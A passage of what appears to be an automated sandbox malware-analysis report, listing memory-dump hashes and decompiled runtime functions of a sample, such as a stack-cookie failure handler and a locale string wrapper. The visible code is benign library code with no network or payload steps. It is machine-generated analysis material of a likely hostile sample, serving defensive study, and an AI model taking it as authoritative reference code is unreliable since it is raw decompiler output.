                                                                                                              • Opcode Fuzzy Hash: 9b4346efb4c691672479a535c9acdb57551ea6cacdb850e35f8bfa0ebc6414a8
                                                                                                              • Instruction Fuzzy Hash: 8A41F7765093806FD3118F159C45A63FFB8EF86630F08C89FFD899B212D235A905CBA2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912492556.00000000026C2000.00000040.00000001.sdmp, Offset: 026C2000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 50446ed7a864c8f797c4de1238c24ba2bde9572d40aed001b31becaddc017e86
                                                                                                              • Instruction ID: f144f43ffc19da7a9cb6e4472edf405c266dd545a8b3b1065051eb2b93e63bd8
                                                                                                              • Opcode Fuzzy Hash: 50446ed7a864c8f797c4de1238c24ba2bde9572d40aed001b31becaddc017e86
                                                                                                              • Instruction Fuzzy Hash: 76216F76544304AFD350CF0AEC41A67FBE8EB88670F18C96EFD4997311E275E5148BA2
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912492556.00000000026C2000.00000040.00000001.sdmp, Offset: 026C2000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912492556.00000000026C2000.00000040.00000001.sdmp, Offset: 026C2000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912492556.00000000026C2000.00000040.00000001.sdmp, Offset: 026C2000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912492556.00000000026C2000.00000040.00000001.sdmp, Offset: 026C2000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912492556.00000000026C2000.00000040.00000001.sdmp, Offset: 026C2000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912471745.00000000026B2000.00000040.00000001.sdmp, Offset: 026B2000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.912471745.00000000026B2000.00000040.00000001.sdmp, Offset: 026B2000, based on PE: false
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              Non-executed Functions

                                                                                                              C-Code - Quality: 85%
                                                                                                              			E0040CDC9(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                              				intOrPtr _v0;
                                                                                                              				void* _v804;
                                                                                                              				intOrPtr _v808;
                                                                                                              				intOrPtr _v812;
                                                                                                              				intOrPtr _t6;
                                                                                                              				intOrPtr _t11;
                                                                                                              				intOrPtr _t12;
                                                                                                              				intOrPtr _t13;
                                                                                                              				long _t17;
                                                                                                              				intOrPtr _t21;
                                                                                                              				intOrPtr _t22;
                                                                                                              				intOrPtr _t25;
                                                                                                              				intOrPtr _t26;
                                                                                                              				intOrPtr _t27;
                                                                                                              				intOrPtr* _t31;
                                                                                                              				void* _t34;
                                                                                                              
                                                                                                              				_t27 = __esi;
                                                                                                              				_t26 = __edi;
                                                                                                              				_t25 = __edx;
                                                                                                              				_t22 = __ecx;
                                                                                                              				_t21 = __ebx;
                                                                                                              				_t6 = __eax;
                                                                                                              				_t34 = _t22 -  *0x422234; // 0xdc63c9ab
                                                                                                              				if(_t34 == 0) {
                                                                                                              					asm("repe ret");
                                                                                                              				}
                                                                                                              				 *0x423b98 = _t6;
                                                                                                              				 *0x423b94 = _t22;
                                                                                                              				 *0x423b90 = _t25;
                                                                                                              				 *0x423b8c = _t21;
                                                                                                              				 *0x423b88 = _t27;
                                                                                                              				 *0x423b84 = _t26;
                                                                                                              				 *0x423bb0 = ss;
                                                                                                              				 *0x423ba4 = cs;
                                                                                                              				 *0x423b80 = ds;
                                                                                                              				 *0x423b7c = es;
                                                                                                              				 *0x423b78 = fs;
                                                                                                              				 *0x423b74 = gs;
                                                                                                              				asm("pushfd");
                                                                                                              				_pop( *0x423ba8);
                                                                                                              				 *0x423b9c =  *_t31;
                                                                                                              				 *0x423ba0 = _v0;
                                                                                                              				 *0x423bac =  &_a4;
                                                                                                              				 *0x423ae8 = 0x10001;
                                                                                                              				_t11 =  *0x423ba0; // 0x0
                                                                                                              				 *0x423a9c = _t11;
                                                                                                              				 *0x423a90 = 0xc0000409;
                                                                                                              				 *0x423a94 = 1;
                                                                                                              				_t12 =  *0x422234; // 0xdc63c9ab
                                                                                                              				_v812 = _t12;
                                                                                                              				_t13 =  *0x422238; // 0x239c3654
                                                                                                              				_v808 = _t13;
                                                                                                              				 *0x423ae0 = IsDebuggerPresent();
                                                                                                              				_push(1);
                                                                                                              				E004138BC(_t14);
                                                                                                              				SetUnhandledExceptionFilter(0);
                                                                                                              				_t17 = UnhandledExceptionFilter(0x41fb80);
                                                                                                              				if( *0x423ae0 == 0) {
                                                                                                              					_push(1);
                                                                                                              					E004138BC(_t17);
                                                                                                              				}
                                                                                                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                              			}




















                                                                                                              APIs
                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 004136B4
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004136C9
                                                                                                              • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 004136D4
                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 004136F0
                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 004136F7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                              • String ID:
                                                                                                              • API String ID: 2579439406-0
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 100%
                                                                                                              			E0040AD70(intOrPtr* __ecx) {
                                                                                                              				void* _t5;
                                                                                                              				intOrPtr* _t11;
                                                                                                              
                                                                                                              				_t11 = __ecx;
                                                                                                              				_t5 =  *(__ecx + 8);
                                                                                                              				 *__ecx = 0x41eff0;
                                                                                                              				if(_t5 != 0) {
                                                                                                              					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                                                                                                              				}
                                                                                                              				if( *(_t11 + 0xc) != 0) {
                                                                                                              					_t5 = GetProcessHeap();
                                                                                                              					if(_t5 != 0) {
                                                                                                              						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                                                                                                              					}
                                                                                                              				}
                                                                                                              				return _t5;
                                                                                                              			}






                                                                                                              APIs
                                                                                                              • GetProcessHeap.KERNEL32 ref: 0040AD90
                                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp
                                                                                                              Similarity
                                                                                                              • API ID: Heap$FreeProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 3859560861-0
                                                                                                              • Opcode ID: 1cc3613efa1b408a07d3bda581eddd458e6bd1778ad13645e2e7b7f8138afa03
                                                                                                              • Instruction ID: 87dac2184505844c09cb42e2b5ef4fe4ca92d2df11bc344c415d2bc0d320b6aa
                                                                                                              • Opcode Fuzzy Hash: 1cc3613efa1b408a07d3bda581eddd458e6bd1778ad13645e2e7b7f8138afa03
                                                                                                              • Instruction Fuzzy Hash: 7FE09A312003009FC3209B21DC08F9337AAEF88311F15C42AE95AD36A0CB78EC82CB59
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 100%
                                                                                                              			E004123B1() {
                                                                                                              
                                                                                                              				SetUnhandledExceptionFilter(E0041236F);
                                                                                                              				return 0;
                                                                                                              			}




                                                                                                              APIs
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001236F), ref: 004123B6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                              • String ID:
                                                                                                              • API String ID: 3192549508-0
                                                                                                              • Opcode ID: c5bec46203bb928b6661f320d0224aa42f58454027b2ed7ef2d3bc0e147829a7
                                                                                                              • Instruction ID: a9d574e59b617bab4533f0d30aa636e653cc17d396c8e80ebbe0ff8c2e40eb30
                                                                                                              • Opcode Fuzzy Hash: c5bec46203bb928b6661f320d0224aa42f58454027b2ed7ef2d3bc0e147829a7
                                                                                                              • Instruction Fuzzy Hash: 6590027065114C8B464057705D0D68729D8BA4C6067D148616436C4058EB9842509559
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 86%
                                                                                                              			E00417041(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                                                                              				signed int _v8;
                                                                                                              				int _v12;
                                                                                                              				int _v16;
                                                                                                              				int _v20;
                                                                                                              				intOrPtr _v24;
                                                                                                              				void* _v36;
                                                                                                              				void* __ebx;
                                                                                                              				void* __edi;
                                                                                                              				void* __esi;
                                                                                                              				void* __ebp;
                                                                                                              				signed int _t110;
                                                                                                              				intOrPtr _t112;
                                                                                                              				intOrPtr _t113;
                                                                                                              				short* _t115;
                                                                                                              				short* _t116;
                                                                                                              				char* _t120;
                                                                                                              				short* _t121;
                                                                                                              				short* _t123;
                                                                                                              				short* _t127;
                                                                                                              				int _t128;
                                                                                                              				short* _t141;
                                                                                                              				signed int _t144;
                                                                                                              				void* _t146;
                                                                                                              				short* _t147;
                                                                                                              				signed int _t150;
                                                                                                              				short* _t153;
                                                                                                              				char* _t157;
                                                                                                              				int _t160;
                                                                                                              				long _t162;
                                                                                                              				signed int _t174;
                                                                                                              				signed int _t178;
                                                                                                              				signed int _t179;
                                                                                                              				int _t182;
                                                                                                              				short* _t184;
                                                                                                              				signed int _t186;
                                                                                                              				signed int _t188;
                                                                                                              				short* _t189;
                                                                                                              				int _t191;
                                                                                                              				intOrPtr _t194;
                                                                                                              				int _t207;
                                                                                                              
                                                                                                              				_t110 =  *0x422234; // 0xdc63c9ab
                                                                                                              				_v8 = _t110 ^ _t188;
                                                                                                              				_t184 = __ecx;
                                                                                                              				_t194 =  *0x423e7c; // 0x1
                                                                                                              				if(_t194 == 0) {
                                                                                                              					_t182 = 1;
                                                                                                              					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                                                                                                              						_t162 = GetLastError();
                                                                                                              						__eflags = _t162 - 0x78;
                                                                                                              						if(_t162 == 0x78) {
                                                                                                              							 *0x423e7c = 2;
                                                                                                              						}
                                                                                                              					} else {
                                                                                                              						 *0x423e7c = 1;
                                                                                                              					}
                                                                                                              				}
                                                                                                              				if(_a16 <= 0) {
                                                                                                              					L13:
                                                                                                              					_t112 =  *0x423e7c; // 0x1
                                                                                                              					if(_t112 == 2 || _t112 == 0) {
                                                                                                              						_v16 = 0;
                                                                                                              						_v20 = 0;
                                                                                                              						__eflags = _a4;
                                                                                                              						if(_a4 == 0) {
                                                                                                              							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                                                                              						}
                                                                                                              						__eflags = _a28;
                                                                                                              						if(_a28 == 0) {
                                                                                                              							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                              						}
                                                                                                              						_t113 = E004179E0(0, _t179, _t182, _t184, _a4);
                                                                                                              						_v24 = _t113;
                                                                                                              						__eflags = _t113 - 0xffffffff;
                                                                                                              						if(_t113 != 0xffffffff) {
                                                                                                              							__eflags = _t113 - _a28;
                                                                                                              							if(_t113 == _a28) {
                                                                                                              								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                                                                              								L78:
                                                                                                              								__eflags = _v16;
                                                                                                              								if(__eflags != 0) {
                                                                                                              									_push(_v16);
                                                                                                              									E0040B675(0, _t182, _t184, __eflags);
                                                                                                              								}
                                                                                                              								_t115 = _v20;
                                                                                                              								__eflags = _t115;
                                                                                                              								if(_t115 != 0) {
                                                                                                              									__eflags = _a20 - _t115;
                                                                                                              									if(__eflags != 0) {
                                                                                                              										_push(_t115);
                                                                                                              										E0040B675(0, _t182, _t184, __eflags);
                                                                                                              									}
                                                                                                              								}
                                                                                                              								_t116 = _t184;
                                                                                                              								goto L84;
                                                                                                              							}
                                                                                                              							_t120 = E00417A29(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                                                                              							_t191 =  &(_t189[0xc]);
                                                                                                              							_v16 = _t120;
                                                                                                              							__eflags = _t120;
                                                                                                              							if(_t120 == 0) {
                                                                                                              								goto L58;
                                                                                                              							}
                                                                                                              							_t121 = LCMapStringA(_a4, _a8, _t120, _a16, 0, 0);
                                                                                                              							_v12 = _t121;
                                                                                                              							__eflags = _t121;
                                                                                                              							if(__eflags != 0) {
                                                                                                              								if(__eflags <= 0) {
                                                                                                              									L71:
                                                                                                              									_t182 = 0;
                                                                                                              									__eflags = 0;
                                                                                                              									L72:
                                                                                                              									__eflags = _t182;
                                                                                                              									if(_t182 == 0) {
                                                                                                              										goto L62;
                                                                                                              									}
                                                                                                              									E0040B9F0(_t182, _t182, 0, _v12);
                                                                                                              									_t123 = LCMapStringA(_a4, _a8, _v16, _a16, _t182, _v12);
                                                                                                              									_v12 = _t123;
                                                                                                              									__eflags = _t123;
                                                                                                              									if(_t123 != 0) {
                                                                                                              										_t186 = E00417A29(_t179, _v24, _a28, _t182,  &_v12, _a20, _a24);
                                                                                                              										_v20 = _t186;
                                                                                                              										asm("sbb esi, esi");
                                                                                                              										_t184 =  ~_t186 & _v12;
                                                                                                              										__eflags = _t184;
                                                                                                              									} else {
                                                                                                              										_t184 = 0;
                                                                                                              									}
                                                                                                              									E0041476E(_t182);
                                                                                                              									goto L78;
                                                                                                              								}
                                                                                                              								__eflags = _t121 - 0xffffffe0;
                                                                                                              								if(_t121 > 0xffffffe0) {
                                                                                                              									goto L71;
                                                                                                              								}
                                                                                                              								_t127 =  &(_t121[4]);
                                                                                                              								__eflags = _t127 - 0x400;
                                                                                                              								if(_t127 > 0x400) {
                                                                                                              									_t128 = E0040B80D(0, _t179, _t182, _t127);
                                                                                                              									__eflags = _t128;
                                                                                                              									if(_t128 != 0) {
                                                                                                              										 *_t128 = 0xdddd;
                                                                                                              										_t128 = _t128 + 8;
                                                                                                              										__eflags = _t128;
                                                                                                              									}
                                                                                                              									_t182 = _t128;
                                                                                                              									goto L72;
                                                                                                              								}
                                                                                                              								E0040CF70(_t127);
                                                                                                              								_t182 = _t191;
                                                                                                              								__eflags = _t182;
                                                                                                              								if(_t182 == 0) {
                                                                                                              									goto L62;
                                                                                                              								}
                                                                                                              								 *_t182 = 0xcccc;
                                                                                                              								_t182 = _t182 + 8;
                                                                                                              								goto L72;
                                                                                                              							}
                                                                                                              							L62:
                                                                                                              							_t184 = 0;
                                                                                                              							goto L78;
                                                                                                              						} else {
                                                                                                              							goto L58;
                                                                                                              						}
                                                                                                              					} else {
                                                                                                              						if(_t112 != 1) {
                                                                                                              							L58:
                                                                                                              							_t116 = 0;
                                                                                                              							L84:
                                                                                                              							return E0040CDC9(_t116, 0, _v8 ^ _t188, _t179, _t182, _t184);
                                                                                                              						}
                                                                                                              						_v12 = 0;
                                                                                                              						if(_a28 == 0) {
                                                                                                              							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                                                                              						}
                                                                                                              						_t184 = MultiByteToWideChar;
                                                                                                              						_t182 = MultiByteToWideChar(_a28, 1 + (0 | _a32 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                              						_t207 = _t182;
                                                                                                              						if(_t207 == 0) {
                                                                                                              							goto L58;
                                                                                                              						} else {
                                                                                                              							if(_t207 <= 0) {
                                                                                                              								L28:
                                                                                                              								_v16 = 0;
                                                                                                              								L29:
                                                                                                              								if(_v16 == 0) {
                                                                                                              									goto L58;
                                                                                                              								}
                                                                                                              								if(MultiByteToWideChar(_a28, 1, _a12, _a16, _v16, _t182) == 0) {
                                                                                                              									L52:
                                                                                                              									E0041476E(_v16);
                                                                                                              									_t116 = _v12;
                                                                                                              									goto L84;
                                                                                                              								}
                                                                                                              								_t184 = LCMapStringW;
                                                                                                              								_t174 = LCMapStringW(_a4, _a8, _v16, _t182, 0, 0);
                                                                                                              								_v12 = _t174;
                                                                                                              								if(_t174 == 0) {
                                                                                                              									goto L52;
                                                                                                              								}
                                                                                                              								if((_a8 & 0x00000400) == 0) {
                                                                                                              									__eflags = _t174;
                                                                                                              									if(_t174 <= 0) {
                                                                                                              										L44:
                                                                                                              										_t184 = 0;
                                                                                                              										__eflags = 0;
                                                                                                              										L45:
                                                                                                              										__eflags = _t184;
                                                                                                              										if(_t184 != 0) {
                                                                                                              											_t141 = LCMapStringW(_a4, _a8, _v16, _t182, _t184, _v12);
                                                                                                              											__eflags = _t141;
                                                                                                              											if(_t141 != 0) {
                                                                                                              												_push(0);
                                                                                                              												_push(0);
                                                                                                              												__eflags = _a24;
                                                                                                              												if(_a24 != 0) {
                                                                                                              													_push(_a24);
                                                                                                              													_push(_a20);
                                                                                                              												} else {
                                                                                                              													_push(0);
                                                                                                              													_push(0);
                                                                                                              												}
                                                                                                              												_v12 = WideCharToMultiByte(_a28, 0, _t184, _v12, ??, ??, ??, ??);
                                                                                                              											}
                                                                                                              											E0041476E(_t184);
                                                                                                              										}
                                                                                                              										goto L52;
                                                                                                              									}
                                                                                                              									_t144 = 0xffffffe0;
                                                                                                              									_t179 = _t144 % _t174;
                                                                                                              									__eflags = _t144 / _t174 - 2;
                                                                                                              									if(_t144 / _t174 < 2) {
                                                                                                              										goto L44;
                                                                                                              									}
                                                                                                              									_t52 = _t174 + 8; // 0x8
                                                                                                              									_t146 = _t174 + _t52;
                                                                                                              									__eflags = _t146 - 0x400;
                                                                                                              									if(_t146 > 0x400) {
                                                                                                              										_t147 = E0040B80D(0, _t179, _t182, _t146);
                                                                                                              										__eflags = _t147;
                                                                                                              										if(_t147 != 0) {
                                                                                                              											 *_t147 = 0xdddd;
                                                                                                              											_t147 =  &(_t147[4]);
                                                                                                              											__eflags = _t147;
                                                                                                              										}
                                                                                                              										_t184 = _t147;
                                                                                                              										goto L45;
                                                                                                              									}
                                                                                                              									E0040CF70(_t146);
                                                                                                              									_t184 = _t189;
                                                                                                              									__eflags = _t184;
                                                                                                              									if(_t184 == 0) {
                                                                                                              										goto L52;
                                                                                                              									}
                                                                                                              									 *_t184 = 0xcccc;
                                                                                                              									_t184 =  &(_t184[4]);
                                                                                                              									goto L45;
                                                                                                              								}
                                                                                                              								if(_a24 != 0 && _t174 <= _a24) {
                                                                                                              									LCMapStringW(_a4, _a8, _v16, _t182, _a20, _a24);
                                                                                                              								}
                                                                                                              								goto L52;
                                                                                                              							}
                                                                                                              							_t150 = 0xffffffe0;
                                                                                                              							_t179 = _t150 % _t182;
                                                                                                              							if(_t150 / _t182 < 2) {
                                                                                                              								goto L28;
                                                                                                              							}
                                                                                                              							_t25 = _t182 + 8; // 0x8
                                                                                                              							_t152 = _t182 + _t25;
                                                                                                              							if(_t182 + _t25 > 0x400) {
                                                                                                              								_t153 = E0040B80D(0, _t179, _t182, _t152);
                                                                                                              								__eflags = _t153;
                                                                                                              								if(_t153 == 0) {
                                                                                                              									L27:
                                                                                                              									_v16 = _t153;
                                                                                                              									goto L29;
                                                                                                              								}
                                                                                                              								 *_t153 = 0xdddd;
                                                                                                              								L26:
                                                                                                              								_t153 =  &(_t153[4]);
                                                                                                              								goto L27;
                                                                                                              							}
                                                                                                              							E0040CF70(_t152);
                                                                                                              							_t153 = _t189;
                                                                                                              							if(_t153 == 0) {
                                                                                                              								goto L27;
                                                                                                              							}
                                                                                                              							 *_t153 = 0xcccc;
                                                                                                              							goto L26;
                                                                                                              						}
                                                                                                              					}
                                                                                                              				}
                                                                                                              				_t178 = _a16;
                                                                                                              				_t157 = _a12;
                                                                                                              				while(1) {
                                                                                                              					_t178 = _t178 - 1;
                                                                                                              					if( *_t157 == 0) {
                                                                                                              						break;
                                                                                                              					}
                                                                                                              					_t157 =  &(_t157[1]);
                                                                                                              					if(_t178 != 0) {
                                                                                                              						continue;
                                                                                                              					}
                                                                                                              					_t178 = _t178 | 0xffffffff;
                                                                                                              					break;
                                                                                                              				}
                                                                                                              				_t160 = _a16 - _t178 - 1;
                                                                                                              				if(_t160 < _a16) {
                                                                                                              					_t160 = _t160 + 1;
                                                                                                              				}
                                                                                                              				_a16 = _t160;
                                                                                                              				goto L13;
                                                                                                              			}











































                                                                                                              0x004173d4
                                                                                                              0x004173e5
                                                                                                              0x004173e5
                                                                                                              0x004170e0
                                                                                                              0x004170e6
                                                                                                              0x004170ed
                                                                                                              0x004170ed
                                                                                                              0x004170f0
                                                                                                              0x00417113
                                                                                                              0x00417115
                                                                                                              0x00417117
                                                                                                              0x00000000
                                                                                                              0x0041711d
                                                                                                              0x0041711d
                                                                                                              0x00417162
                                                                                                              0x00417162
                                                                                                              0x00417165
                                                                                                              0x00417168
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00417181
                                                                                                              0x0041726a
                                                                                                              0x0041726d
                                                                                                              0x00417272
                                                                                                              0x00000000
                                                                                                              0x00417275
                                                                                                              0x00417187
                                                                                                              0x0041719b
                                                                                                              0x0041719d
                                                                                                              0x004171a2
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x004171af
                                                                                                              0x004171da
                                                                                                              0x004171dc
                                                                                                              0x00417223
                                                                                                              0x00417223
                                                                                                              0x00417223
                                                                                                              0x00417225
                                                                                                              0x00417225
                                                                                                              0x00417227
                                                                                                              0x00417237
                                                                                                              0x0041723d
                                                                                                              0x0041723f
                                                                                                              0x00417241
                                                                                                              0x00417242
                                                                                                              0x00417243
                                                                                                              0x00417246
                                                                                                              0x0041724c
                                                                                                              0x0041724f
                                                                                                              0x00417248
                                                                                                              0x00417248
                                                                                                              0x00417249
                                                                                                              0x00417249
                                                                                                              0x00417260
                                                                                                              0x00417260
                                                                                                              0x00417264
                                                                                                              0x00417269
                                                                                                              0x00000000
                                                                                                              0x00417227
                                                                                                              0x004171e2
                                                                                                              0x004171e3
                                                                                                              0x004171e5
                                                                                                              0x004171e8
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x004171ea
                                                                                                              0x004171ea
                                                                                                              0x004171ee
                                                                                                              0x004171f3
                                                                                                              0x0041720c
                                                                                                              0x00417212
                                                                                                              0x00417214
                                                                                                              0x00417216
                                                                                                              0x0041721c
                                                                                                              0x0041721c
                                                                                                              0x0041721c
                                                                                                              0x0041721f
                                                                                                              0x00000000
                                                                                                              0x0041721f
                                                                                                              0x004171f5
                                                                                                              0x004171fa
                                                                                                              0x004171fc
                                                                                                              0x004171fe
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00417200
                                                                                                              0x00417206
                                                                                                              0x00000000
                                                                                                              0x00417206
                                                                                                              0x004171b4
                                                                                                              0x004171d3
                                                                                                              0x004171d3
                                                                                                              0x00000000
                                                                                                              0x004171b4
                                                                                                              0x00417123
                                                                                                              0x00417124
                                                                                                              0x00417129
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x0041712b
                                                                                                              0x0041712b
                                                                                                              0x00417134
                                                                                                              0x0041714a
                                                                                                              0x00417150
                                                                                                              0x00417152
                                                                                                              0x0041715d
                                                                                                              0x0041715d
                                                                                                              0x00000000
                                                                                                              0x0041715d
                                                                                                              0x00417154
                                                                                                              0x0041715a
                                                                                                              0x0041715a
                                                                                                              0x00000000
                                                                                                              0x0041715a
                                                                                                              0x00417136
                                                                                                              0x0041713b
                                                                                                              0x0041713f
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x00417141
                                                                                                              0x00000000
                                                                                                              0x00417141
                                                                                                              0x00417117
                                                                                                              0x004170c9
                                                                                                              0x0041709f
                                                                                                              0x004170a2
                                                                                                              0x004170a5
                                                                                                              0x004170a5
                                                                                                              0x004170a8
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x004170aa
                                                                                                              0x004170ad
                                                                                                              0x00000000
                                                                                                              0x00000000
                                                                                                              0x004170af
                                                                                                              0x00000000
                                                                                                              0x004170af
                                                                                                              0x004170b7
                                                                                                              0x004170bb
                                                                                                              0x004170bd
                                                                                                              0x004170bd
                                                                                                              0x004170be
                                                                                                              0x00000000

                                                                                                              APIs
                                                                                                              • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417073
                                                                                                              • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,02901860), ref: 00417085
                                                                                                              • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417111
                                                                                                              • _malloc.LIBCMT ref: 0041714A
                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 0041717D
                                                                                                              • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 00417199
                                                                                                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 004171D3
                                                                                                              • _malloc.LIBCMT ref: 0041720C
                                                                                                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417237
                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041725A
                                                                                                              • __freea.LIBCMT ref: 00417264
                                                                                                              • __freea.LIBCMT ref: 0041726D
                                                                                                              • ___ansicp.LIBCMT ref: 0041729E
                                                                                                              • ___convertcp.LIBCMT ref: 004172C9
                                                                                                              • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 004172EA
                                                                                                              • _malloc.LIBCMT ref: 00417322
                                                                                                              • _memset.LIBCMT ref: 00417344
                                                                                                              • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041735C
                                                                                                              • ___convertcp.LIBCMT ref: 0041737A
                                                                                                              • __freea.LIBCMT ref: 0041738F
                                                                                                              • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173A9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.911697008.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.911727134.0000000000448000.00000040.00000001.sdmp Download File
                                                                                                              Similarity
                                                                                                              • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3809854901-0
                                                                                                              • Opcode ID: 69f09b59e09a0bd2d6d81dae250e0d8151cfd5ec05e1e85cbf6b7e3de0be678f
                                                                                                              • Instruction ID: abda70701d45e68d96e2917a94aa4f5dbb1b5ba954cdfcd5a2fe0a3214fe1872
                                                                                                              • Opcode Fuzzy Hash: 69f09b59e09a0bd2d6d81dae250e0d8151cfd5ec05e1e85cbf6b7e3de0be678f
                                                                                                              • Instruction Fuzzy Hash: DCB1A072908119EFDF119FA5CC808EF3BB5EB48354B14856BFD15A2260D3398DD2DBA8
                                                                                                              Uniqueness

                                                                                                              Uniqueness Score: -1.00%

                                                                                                              C-Code - Quality: 83%
                                                                                                              			E00405760(intOrPtr* __eax) {
                                                                                                              				void* __ebx;
